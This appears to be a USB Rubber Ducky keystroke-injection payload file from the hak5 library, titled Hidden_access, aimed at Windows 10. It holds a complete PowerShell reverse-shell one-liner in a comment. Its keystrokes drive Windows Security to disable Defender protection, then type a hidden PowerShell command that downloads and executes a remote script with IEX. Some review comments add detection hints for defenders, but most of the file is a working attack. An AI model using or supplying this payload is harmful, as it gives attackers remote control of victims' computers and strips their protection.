hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/remote_access/Hidden_access/payload.txt
REM Author: makozort
REM Title: Hidden_access
REM Target: windows 10
REM Description: gain a reverse shell to target's pc, the script works VERY quickly against machines with disabled defender
REM THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE, I TAKE NO RESPONSIBILITIES FOR ANY MISUSE
REM This is the rs.ps1 to host
REM $client = New-Object System.Net.Sockets.TCPClient("{IP here}",{PORT HERE});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
DELAY 1000
CTRL ESC
DELAY 300
REM this block disables windows defender, delete it if you don't need to. target may have variables that mean you need to change how many times "TAB" is hit
REM NOTE(review): defender view - per the REM above, the keystrokes from here to ALT F4 drive the Windows Security app to switch Defender protection off.
REM NOTE(review): presumably this only succeeds when the logged-in session is able to approve the change (confirm on your build). Microsoft Defender logs event ID 5001 when real-time protection is disabled, which is worth alerting on.
STRING windows security
DELAY 300
ENTER
DELAY 1000
ENTER
TAB
TAB
TAB
TAB
DELAY 300
ENTER
DELAY 600
SPACE
DELAY 600
LEFT
ENTER
DELAY 300
ALT F4
GUI r
DELAY 600
REM open up powershell in hidden mode, run the command (the rs.ps1 that needs to be edited) you have already uploaded somewhere so that the ducky does not have to type it all out
REM NOTE(review): defender view - typed into the Run dialog opened by GUI r, this starts PowerShell with a hidden window, downloads text from the placeholder URL and executes it with IEX.
REM NOTE(review): process-creation logging of the powershell command line and PowerShell script block logging (event ID 4104) are the usual places this shows up - confirm both are enabled and forwarded.
STRING powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('LINK HERE');
ENTER
DELAY 600
LEFT
ENTER